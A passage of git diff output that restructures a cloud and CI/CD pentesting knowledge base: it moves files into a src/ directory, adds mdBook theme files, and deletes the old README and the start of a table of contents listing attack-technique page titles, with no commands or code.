src/pentesting-cloud}/azure-security/az-services/az-automation-account/README.md (66%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-azuread.md (79%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-file-shares.md (58%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-function-apps.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-logic-apps.md (52%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-queue-enum.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-servicebus-enum.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-sql.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-storage.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-table-storage.md create mode 100644 src/pentesting-cloud/azure-security/az-services/intune.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/keyvault.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/vms/README.md (80%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/vms/az-azure-network.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-unauthenticated-enum-and-initial-entry/README.md (80%) create mode 100644 src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md create mode 100644 src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/README.md rename {pentesting-cloud => src/pentesting-cloud}/digital-ocean-pentesting/do-basic-information.md (73%) create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md rename {pentesting-cloud => src/pentesting-cloud}/digital-ocean-pentesting/do-services/do-droplets.md (57%) create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/README.md (55%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-basic-information/README.md (73%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-permissions-for-a-pentest.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-persistence/README.md (100%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-persistence/gcp-non-svc-persistance.md (63%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/README.md (100%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md (76%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md (53%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md (52%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md (72%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md (55%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md (56%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/README.md (55%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md (64%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md (57%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md (58%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md (56%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md (56%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md (54%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md (60%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md (62%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md (50%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/README.md (100%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-app-engine-enum.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-artifact-registry-enum.md (54%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-bigquery-enum.md (64%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-compute-instances-enum/README.md (63%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-firebase-enum.md (59%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md (55%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-kms-enum.md (57%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-logging-enum.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-pub-sub.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-security-enum.md (53%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-storage-enum.md (61%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-to-workspace-pivoting/README.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md (56%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md (65%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md create mode 100644 src/pentesting-cloud/ibm-cloud-pentesting/README.md create mode 100644 src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md rename {pentesting-cloud => src/pentesting-cloud}/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md (62%) create mode 100644 src/pentesting-cloud/kubernetes-security/README.md rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md (80%) create mode 100644 src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md (72%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/exposing-services-in-kubernetes.md (67%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-basics.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-enumeration.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-external-secrets-operator.md (83%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-hardening/README.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md (83%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-kyverno/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md (78%) create mode 100644 src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-network-attacks.md (61%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-opa-gatekeeper/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md (79%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-pivoting-to-clouds.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-role-based-access-control-rbac.md (62%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-validatingwebhookconfiguration.md (80%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/pentesting-kubernetes-services/README.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md (55%) create mode 100644 src/pentesting-cloud/openshift-pentesting/README.md rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-basic-information.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-jenkins/README.md (93%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md (100%) create mode 100644 src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md (78%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md (92%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-scc.md (82%) rename {pentesting-cloud => src/pentesting-cloud}/pentesting-cloud-methodology.md (71%) create mode 100644 src/pentesting-cloud/workspace-security/README.md rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-google-platforms-phishing/README.md (56%) create mode 100644 src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md create mode 100644 src/pentesting-cloud/workspace-security/gws-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-post-exploitation.md (56%) create mode 100644 src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md (80%) rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md (57%) create mode 100644 theme/book.js create mode 100644 theme/css/chrome.css create mode 100644 theme/css/general.css create mode 100644 theme/css/print.css create mode 100644 theme/css/variables.css create mode 100644 theme/favicon.png create mode 100644 theme/favicon.svg create mode 100644 theme/fonts/OPEN-SANS-LICENSE.txt create mode 100644 theme/fonts/SOURCE-CODE-PRO-LICENSE.txt create mode 100644 theme/fonts/fonts.css create mode 100644 theme/fonts/open-sans-v17-all-charsets-300.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-300italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-600.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-600italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-700.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-700italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-800.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-800italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-regular.woff2 create mode 100644 theme/fonts/source-code-pro-v11-all-charsets-500.woff2 create mode 100644 theme/highlight.css create mode 100644 theme/highlight.js create mode 100644 theme/ht_searcher.js create mode 100644 theme/index.hbs create mode 100644 theme/pagetoc.css create mode 100644 theme/pagetoc.js create mode 100644 theme/sponsor.js create mode 100644 theme/tabs.css create mode 100644 theme/tabs.js create mode 100644 theme/toc.js.hbs diff --git a/.gitbook/assets/empty.zip b/.gitbook/assets/empty.zip deleted file mode 100644 index 15cb0ecb3e219d1701294bfdf0fe3f5cb5d208e7..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 22 NcmWIWW@Tf*000g10H*)| diff --git a/.gitignore b/.gitignore index 6826262d3..7fa947732 100644 --- a/.gitignore +++ b/.gitignore @@ -30,4 +30,9 @@ Icon .AppleDesktop Network Trash Folder Temporary Items -.apdisk \ No newline at end of file +.apdisk + +#Mdbook +book +book/* +hacktricks-preprocessor.log diff --git a/README.md b/README.md deleted file mode 100644 index 17db20c7d..000000000 --- a/README.md +++ /dev/null @@ -1,67 +0,0 @@ -# HackTricks Cloud - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -
- -_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ - -{% hint style="success" %} -Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. -{% endhint %} - -### **Pentesting CI/CD Methodology** - -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-ci-cd/pentesting-ci-cd-methodology.md" %} -[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -{% endcontent-ref %} - -### Pentesting Cloud Methodology - -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-cloud/pentesting-cloud-methodology.md" %} -[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) -{% endcontent-ref %} - -### License & Disclaimer - -**Check them in:** - -{% content-ref url="https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq" %} -[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) -{% endcontent-ref %} - -### Github Stats - -![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/SUMMARY.md b/SUMMARY.md deleted file mode 100644 index 921ed2d3d..000000000 --- a/SUMMARY.md +++ /dev/null @@ -1,503 +0,0 @@ -# Table of contents - -## 👽 Welcome! - -* [HackTricks Cloud](README.md) -* [About the Author](https://book.hacktricks.xyz/welcome/about-the-author) -* [HackTricks Values & faq](https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq) - -## 🏭 Pentesting CI/CD - -* [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -* [Github Security](pentesting-ci-cd/github-security/README.md) - * [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) - * [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) - * [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) - * [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) - * [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) - * [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) -* [Gitea Security](pentesting-ci-cd/gitea-security/README.md) - * [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) -* [Concourse Security](pentesting-ci-cd/concourse-security/README.md) - * [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) - * [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) - * [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) -* [CircleCI Security](pentesting-ci-cd/circleci-security.md) -* [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) - * [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) -* [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) - * [Basic Jenkins Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) - * [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) - * [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) - * [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) - * [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) - * [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) -* [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) - * [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) - * [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) -* [Terraform Security](pentesting-ci-cd/terraform-security.md) -* [Atlantis Security](pentesting-ci-cd/atlantis-security.md) -* [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) - * [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) - * [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) -* [Okta Security](pentesting-ci-cd/okta-security/README.md) - * [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) -* [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) -* [Supabase Security](pentesting-ci-cd/supabase-security.md) -* [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) -* [Vercel Security](pentesting-ci-cd/vercel-security.md) -* [TODO](pentesting-ci-cd/todo.md) - -## ⛈️ Pentesting Cloud - -* [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) -* [Kubernetes 